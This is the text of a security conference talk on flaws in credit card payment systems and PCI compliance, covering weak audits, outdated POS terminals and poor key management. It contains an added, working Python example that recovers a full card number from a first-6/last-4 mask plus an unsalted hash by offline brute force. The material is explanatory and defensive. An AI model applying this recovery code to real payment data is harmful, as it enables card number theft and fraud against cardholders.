This document summarizes a presentation about the security flaws in credit card and payment systems. It discusses how credit cards work, the players involved like merchants and banks, and the PCI security standard meant to protect payment data. However, it argues that PCI has many weaknesses like vague requirements, non-technical audits, and outdated systems. It then outlines research on exploiting these flaws, like finding weak encryption keys, targeting vulnerable payment terminals, and using simple attacks. The conclusion is that major data breaches are possible if merchants do not improve their security to meet modern standards.
Copyright: Attribution Non-Commercial (BY-NC)
merchant with your credit card

About this talk…
• Work in progress
• Agenda
  – Credit card backgrounder (hacker style)
  – PCI Overview & Defenses
  – PCI Flaws
Ongoing project, to be updated
TSC LABS Plastic Money - Plastic Trust 2
Who do you trust?
A California Driver’s License
CA License Spec
PAN Tester (Front)
Commerce without Trust
• Cash Commerce
  – You visit a merchant
  – You give them (money)
  – They give you (goods or services)
Commerce with Trust
• Diners Club starts in the '50s
  – "A customer is as good as their name"
  – Merchant (via a Bank) extends 'credit'
  – Customer carries (paper) 'credit card'
  – Merchant trusts customer to pay
  – Customer extends no extra trust to merchant
And the joke is…
• Credit cards are clonable
• Trusting the merchant was a bad idea
PCI
The Players…
• Customers
• Merchants
• Acquirers
• Banks
• Credit Card 'Associations'
• The bad guys
Payment Card Industry
• Industry association
  – Agenda:
    • Defend the brand
    • Make the customers feel safe
    • Protect profits
  – "Standards" issued
  – Created auditor/expert role
  – Advocate of "PCI Security"
Credit Cards
• ISO Standard
• Machine readable ("partially")
• Clonable
• Purely data
CC Process Assumptions
• ("CC" means credit card)
• The customer will defend the CC
• The merchant will defend the CC
• It's hard to steal the CC
• If the CC is stolen, revocation will minimize damage
PCI "Standard"
• Requirement 1: Install and maintain a firewall configuration to protect cardholder data
• Requirement 2: Do not use vendor-supplied defaults for system passwords and other security parameters
• Requirement 3: Protect stored cardholder data
• Requirement 4: Encrypt transmission of cardholder data across open, public networks
• Requirement 5: Use and regularly update anti-virus software
• Requirement 6: Develop and maintain secure systems and applications
• Requirement 7: Restrict access to cardholder data by business need-to-know
• Requirement 8: Assign a unique ID to each person with computer access
• Requirement 9: Restrict physical access to cardholder data
• Requirement 10: Track and monitor all access to network resources and cardholder data
• Requirement 11: Regularly test security systems and processes
• Requirement 12: Maintain a policy that addresses information security
Interpretations
• There are many (at least one per auditor)
• Not generally as good as current 'best practice'
• Implicitly hides merchants who don't use 'best practice'
• Advisory
  – "they won't really fine us"
PCI Defense
PAN Sample (Front)
PAN Sample (Back)
PCI Defenses
• The standard
• The audit process
• Technical upgrades and workarounds
• Payment process improvements
• Best Practices for a modern enterprise
Defenses – the standard
• "The usual best-practices motherhood and hacker pie platitudes about computer security."
• Intuitively obvious 'requirements'
  – Never save the CVV
  – PAN should be encrypted when at rest
  – PAN should be defended while in motion
PCI Defenses - Crypto
• Pre-Internet crypto use
• Vaguely bank-like crypto
• (Some) symmetric algorithms
• (Some) key hygiene
• (Some) use of encrypted data
• (Some) use of encryption in the network
PCI Defenses - Audit
• Country club auditors
• Non-technical
• Paid by merchant
• Interpreter of requirements
• Interpreter of solutions
• Anonymous
PCI Security Research
PCI Security Research
• Targets
  – PAN
  – End nodes
• Data
  – At rest
  – In motion
• Processes
  – Merchant
  – Back-end
  – Contractual
PAN Research
• PAN Tester
  – Credit card
  – Gift Card
  – Captive cards
PAN Tester (Front)
PAN Tester (Back)
Faux Credit Cards
Target Sample
Targets
• Decrepit POS terminals are mainstream
  – Win2k is considered modern
  – Very low horsepower
  – Not patched
  – Not encrypted
  – On undefended network
Other Targets
• POS networks
  – 2000 stores across the US talking to a central site is not a "private" network
  – Substandard defenses by conventional enterprise standards
  – Commingled with corporate networks
  – Minimally funded security efforts
Other Targets
• Acquirer connection
• Out of bounds for merchant audits
• Not clear anyone checks them
• Defense of acquirer not discussed
Recon
• Physical security of end systems
• Process recon
• Web access
• PAN Processing flaws
PCI Violation
PCI “Crypto”
Crypto Vulnerabilities
• No key management
• Weak keys
• Poor key management
• Poor key hygiene
• Home-grown crypto
• Ignorance of crypto work in the last 5 years
Potential Crypto flaws
• SQL Injection to find keys in the database
• Format glitches
• Information leakage (first 6 plus last 4 of a 16-digit PAN leaves only 6 unknown digits, and the known Luhn check digit pins one of them: a 10^5 search space, trivial to walk offline if a hash of the full PAN sits in the same database as the mask…)
• Key generation
• Algorithm implementations
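Two of the deck's points, that a card is "purely data" (the Credit Cards slide) and that first-6-plus-last-4 masking leaks most of the PAN (the information-leakage bullet above), as an added worked example that is not part of the original presentation. It parses a constructed ISO/IEC 7813 Track 2 record (the PAN 4111111111111111 is a well-known test number, not an issued card), masks the PAN the way receipts and logs do, enumerates every Luhn-valid PAN consistent with the mask, and recovers the full PAN from a hypothetical unsalted SHA-256 "token" of the kind a merchant database might store next to the masked value. The function names, the token scheme and the 20xx expiry assumption are all mine.

```python
"""Added example (not from the TSC LABS deck): Track 2 parsing, PAN masking,
and why a first6/last4 mask plus an unsalted hash gives away the whole PAN."""
import hashlib
import itertools
import re
from typing import Iterator, Optional

# ISO/IEC 7813 Track 2 layout: ;PAN=YYMM<service code><discretionary data>?
# (the LRC that follows the end sentinel on the stripe is not part of the text)
TRACK2_RE = re.compile(r"^;(?P<pan>\d{1,19})=(?P<exp>\d{4})(?P<svc>\d{3})(?P<disc>\d*)\?$")


def luhn_sum(pan: str) -> int:
    """Luhn weighted digit sum: every second digit from the right is doubled,
    and a doubled value above 9 has 9 subtracted."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total


def luhn_valid(pan: str) -> bool:
    return pan.isdigit() and luhn_sum(pan) % 10 == 0


def parse_track2(track: str) -> dict:
    """Split a Track 2 record into its fields; the card really is just data."""
    m = TRACK2_RE.match(track)
    if not m:
        raise ValueError("not an ISO 7813 Track 2 record")
    rec = m.groupdict()
    yy, mm = rec["exp"][:2], rec["exp"][2:]
    rec["expiry"] = f"20{yy}-{mm}"          # assumption: a 20xx expiry year
    rec["luhn_ok"] = luhn_valid(rec["pan"])
    return rec


def mask_pan(pan: str) -> str:
    """The first6/last4 form printed on receipts and written to logs."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def pan_candidates(masked: str) -> Iterator[str]:
    """Yield every Luhn-valid PAN consistent with a first6/last4 mask.

    Only the middle digits are hidden, and the known check digit pins the last
    of them: it sits fifth from the right, an undoubled position, so exactly
    one value completes the Luhn sum.  A 16-digit card therefore has 10**5
    candidates, not the 10**6 the six hidden digits suggest.
    """
    head, tail = masked[:6], masked[-4:]
    hidden = len(masked) - 10
    for free in itertools.product("0123456789", repeat=hidden - 1):
        prefix = head + "".join(free)
        fix = (-luhn_sum(prefix + "0" + tail)) % 10   # "0" is a placeholder for the pinned digit
        yield prefix + str(fix) + tail


def pan_token(pan: str) -> str:
    """Hypothetical 'token': an unsalted SHA-256 of the PAN, a common mistake."""
    return hashlib.sha256(pan.encode()).hexdigest()


def recover_pan(masked: str, token: str) -> Optional[str]:
    """Offline brute force: hash each candidate until the stored token matches."""
    for pan in pan_candidates(masked):
        if pan_token(pan) == token:
            return pan
    return None


if __name__ == "__main__":
    # Constructed stripe read; 4111111111111111 is a test number, not an issued card.
    rec = parse_track2(";4111111111111111=2512101123456789?")
    masked = mask_pan(rec["pan"])
    print(rec, masked)
    print(sum(1 for _ in pan_candidates(masked)), "candidates")
    print("recovered:", recover_pan(masked, pan_token(rec["pan"])))
```

The enumeration runs in well under a minute on a laptop, which is the practical point: a masked PAN is only "protected" while nothing else in reach (an unsalted hash, a deterministic "encrypted" column, a gift-card lookup) lets an attacker confirm a guess. PCI DSS makes the same warning about storing hashed and truncated versions of the same PAN together.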
Boring Attacks
• Porous perimeter
  – Web site
    • #include <web_site_attack.h>
  – Storefront
    • Digital limpet mines
    • Bored quasi-geek employees
  – Back office
    • #include <frugal_dp_management.h>
  – Corporate office
    • #include <simple_enterprise_attacks.h>

Boring Targets
• Windows 2000 is "current" for POS terminals
• Databases contain keys, leaked information
• Effectively unsecured networks
  – 40 bit WEP at best
• Genuinely unsecured networks
  – Cleartext internal networks

Boring Exploits
• Anything in "The Idiot's Guide to Attacking with Metasploit"
• All your (Cisco) passwords are belong to us
• Logs? We don't need no steenkin' logs
• Klingon logins ("authentication is for the weak and timid")
• Passwords last changed when Reagan was President
• Passwords based on employee id/name

Conclusions
• A TJX-class incident might happen
  – Oops, old news.
• Someone might get caught using 40 bit WEP
  – Oops, old news.
• Someone might use a digital limpet mine
  – Oops, old news.
• Databases might be compromised…

Conclusions (Seriously)
• Major compromises are possible
• Litigation is possible
• Paypal on a bad day might be better than Visa
• People will start to question the use of pre-Internet legacy payment networks
• Merchants should use 21st century network defense technologies
• Merchants are enterprises handling money and should act accordingly

Credits
• Conference venue by Toorcon
• Three Stooges Driver's License found at http://www.imhimports.com
• Driver's License Spec: http://www.aamva.org/NR/rdonlyres/66260AD6-64B9-45E9-A253-B8AA32241BE0/0/2005DLIDCardSpecV2FINAL.pdf
• PAN Sample photographs by Operations
• PCI Standard: https://www.pcisecuritystandards.org/pdfs/pci_dss_v1-1.pdf
• Visa® Gift Card from Visa International Service Association http://www.visa.com issued by Wells Fargo® Bank
• Presentation software Office 2003™ Excel™ by Microsoft®
Disclaimer No actual PANs were harmed in the production of this presentation.